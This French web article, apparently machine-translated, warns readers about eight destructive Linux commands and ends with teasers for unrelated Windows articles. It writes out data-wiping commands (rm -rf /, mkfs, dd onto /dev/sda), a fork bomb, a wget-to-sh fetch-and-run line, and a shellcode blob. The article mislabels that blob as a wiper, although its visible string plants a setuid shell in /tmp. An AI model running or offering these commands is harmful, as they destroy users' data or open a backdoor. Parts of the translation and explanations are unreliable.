8 commandes mortelles qui ne devraient jamais être exécutées sous Linux

8 commandes mortelles qui ne devraient jamais être exécutées sous Linux

Les commandes de terminal sous Linux sont assez destructrices, si vous exécutez une commande, cela détruira votre système. Linux ne vous demande pas de confirmer lors de l'exécution d'une commande.

Apprendre quelles commandes ne doivent pas être exécutées sous Linux permet de protéger votre système lorsque vous travaillez sous Linux. Vous trouverez ci-dessous 8 commandes mortelles que vous ne devriez jamais exécuter sous Linux.

8 commandes mortelles qui ne devraient jamais être exécutées sous Linux

1. rm -rf / - tout supprimer

La commande rm -rf / supprimera tout, y compris les fichiers de votre disque dur et les fichiers des appareils multimédias connectés à votre ordinateur.

Pour mieux comprendre cette commande, analysez-la comme suit :

  • rm – Supprimez les fichiers suivants.
  • -rf – exécute rm (supprime tous les fichiers et dossiers dans un dossier spécifié) et supprime de force tous les fichiers sans vous le demander au préalable.
  • / – Indique que rm (disons rm) démarre dans le répertoire racine, y compris tous les fichiers de votre ordinateur.

Linux suivra volontiers cette commande et supprimera tout sans vous avertir, alors soyez prudent lorsque vous utilisez cette commande.

De plus, la commande rm est également utilisée de manière très dangereuse. Par exemple, rm –rf ~ supprimera tous les fichiers de votre dossier personnel et rm -rf .* supprimera tous vos fichiers de configuration.

2. Commande déguisée rm –rf /

Voici un extrait de code partout sur le Web :

char esp[] __attribute__ ((section(".text"))) /* esp release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" " \xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7 " "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80 \x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00" "cp - p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

Il s'agit essentiellement d'une autre version de rm –rf / – l'exécution de cette commande supprimera également tous vos fichiers, tout comme l'exécution de rm –rf /.

3. :(){ :|: & };: – Un type de blockbuster

8 commandes mortelles qui ne devraient jamais être exécutées sous Linux

La ligne de commande ci-dessous semble très simple mais sa fonction est en réalité très dangereuse :

:(){ :|: & };:

Cette courte commande créera de nouvelles copies de lui-même. Autrement dit, le processus de sauvegarde lui-même sera continu et entraînera rapidement le remplissage de votre processeur et de votre mémoire.

Cela peut également provoquer le blocage de votre ordinateur. Il s’agit essentiellement d’une attaque par déni de service (DoS).

4. mkfs.ext4 /dev/sda1 – Formats de disque dur

La commande mkfs.ext4 /dev/sda1 est assez simple à comprendre :

  • mkfs.ext4 - crée un système de fichiers ext4 sur le périphérique suivant.
  • /dev/sda1 - identifie la première partition du premier disque dur, qui peut être le disque dur utilisé.

La combinaison de ces deux commandes équivaut à formater le lecteur C: sous Windows – supprimez tous les fichiers de votre première partition et remplacez-les par le nouveau système de fichiers.

Cette commande peut apparaître dans de nombreux formats différents, comme - mkfs.ext3 /dev/sdb2 formatera la deuxième partition de votre deuxième disque dur avec le système de fichiers ext3.

5. commande > /dev/sda - écrire directement sur un disque dur

8 commandes mortelles qui ne devraient jamais être exécutées sous Linux

Ligne de commande > /dev/sda - exécutez une commande et affichez le résultat de cette commande directement sur votre premier disque dur, en écrivant les données directement sur le disque dur et en détruisant votre système de fichiers.

  • command – Exécuter une commande (peut être n’importe quelle commande).
  • > – envoie la sortie de la commande à l'emplacement suivant.
  • /dev/sda – Écrivez la sortie de la commande directement sur le périphérique de disque dur.

6. dd if=/dev/random of=/dev/sda – écrit des données idiotes sur le disque dur

La ligne dd if=/dev/random of=/dev/sda supprimera les données sur l'un de vos disques durs.

  • dd – consiste à effectuer une copie de bas niveau d’un emplacement à un autre.
  • if=/dev/random – Utilisez /dev/random comme entrée – vous pouvez voir des adresses telles que /dev/zero.
  • of=/dev/sda – sortie sur le premier disque dur, remplaçant le système de fichiers par des données aléatoires idiotes.

7. mv ~ /dev/null – Déplacez votre répertoire personnel vers un trou noir

/dev/null - déplacer quelque chose vers /dev/null revient à le détruire. Considérez /dev/null comme un trou noir. mv ~ /dev/null enverra tous vos fichiers personnels dans un trou noir.

  • mv – déplacez le fichier ou le dossier suivant vers un autre emplacement.
  • ~ – L'intégralité de votre dossier personnel.
  • /dev/null – Déplacez votre dossier personnel vers /dev/null, cela détruira tous vos fichiers et supprimera les copies originales.

8. wget http://example.com/something -O – | sh – charger et exécuter un script

La commande ci-dessus téléchargera un script depuis le Web et enverra le script à sh, qui exécutera le contenu du script. Cela peut être dangereux si vous n'êtes pas sûr de ce qu'est un script ou si vous ne disposez pas d'une source de script fiable – n'exécutez pas de scripts non fiables.

wget – télécharge un fichier.

http://example.com/something – téléchargez des fichiers à partir de cet emplacement.

| – Dirigez (envoyez) la sortie de la commande wget (fichier de version téléchargé) directement vers une autre commande.

sh – envoyer le fichier à la commande sh.

Reportez-vous à quelques articles supplémentaires ci-dessous :

S'amuser!


Qu’est-ce qu’ActivateWindowsSearch ? Faut-il le désactiver ?

Qu’est-ce qu’ActivateWindowsSearch ? Faut-il le désactiver ?

ActivateWindowsSearch est une tâche planifiée faisant partie de la fonctionnalité de recherche Windows disponible sur Windows 7, Windows 8.1 et Windows 10. La tâche ActivateWindowsSearch est une partie essentielle de la fonctionnalité de recherche.

Comment activer Ultimate Performance pour optimiser les performances sous Windows 10/11

Comment activer Ultimate Performance pour optimiser les performances sous Windows 10/11

Microsoft a ajouté une fonctionnalité appelée Ultimate Performance à la mise à jour Windows 10 en avril 2018. On peut comprendre qu'il s'agit d'une fonctionnalité qui aide le système à passer en mode de travail hautes performances.

Comment installer un nouveau jeu dicônes dexplorateur de fichiers comme Windows 10 Sun Valley

Comment installer un nouveau jeu dicônes dexplorateur de fichiers comme Windows 10 Sun Valley

Si vous aimez la nouvelle icône de l'Explorateur de fichiers comme Windows 10 Sun Valley, suivez l'article ci-dessous pour modifier la toute nouvelle interface de l'Explorateur de fichiers.

Comment tester la webcam Windows 10

Comment tester la webcam Windows 10

Vérifier si la webcam fonctionne bien sur un ordinateur Windows est simple et rapide. Vous trouverez ci-dessous les étapes pour vous aider à vérifier la caméra.

Comment tester le microphone sous Windows 10

Comment tester le microphone sous Windows 10

Peut-être avez-vous branché des écouteurs de bonne qualité, mais pour une raison quelconque, l'ordinateur portable Windows continue d'essayer d'enregistrer à l'aide de son terrible microphone intégré. L'article suivant vous expliquera comment tester le microphone Windows 10.

Comment supprimer Scan avec Malwarebytes du menu contextuel

Comment supprimer Scan avec Malwarebytes du menu contextuel

Si vous n'en avez plus besoin, vous pouvez supprimer l'option Analyser avec Malwarebytes dans le menu contextuel du clic droit. Voici comment.

En savoir plus sur le protocole Border Gateway (BGP)

En savoir plus sur le protocole Border Gateway (BGP)

Border Gateway Protocol (BGP) est utilisé pour échanger des informations de routage pour Internet et est le protocole utilisé entre les FAI (qui sont des AS différents).

Comment créer votre propre fichier de piratage du registre Windows

Comment créer votre propre fichier de piratage du registre Windows

Lorsque vous lisez des conseils, vous voyez souvent des gens utiliser des fichiers de piratage du registre pour personnaliser et peaufiner les ordinateurs Windows et vous demandez comment les créer. Cet article vous guidera à travers les étapes de base pour créer votre propre fichier de piratage de registre.

Comment activer la sauvegarde automatique du registre dans Windows 10

Comment activer la sauvegarde automatique du registre dans Windows 10

Microsoft avait l'habitude de sauvegarder automatiquement le registre, mais cette fonctionnalité a été discrètement désactivée dans Windows 10. Dans cet article, Quantrimang.com vous guidera à travers les étapes pour sauvegarder automatiquement le registre dans un dossier. \RegBack) sous Windows 10.

Comment annuler une action sur un PC Windows

Comment annuler une action sur un PC Windows

Lorsque vous utilisez un ordinateur, faire des erreurs est tout à fait normal.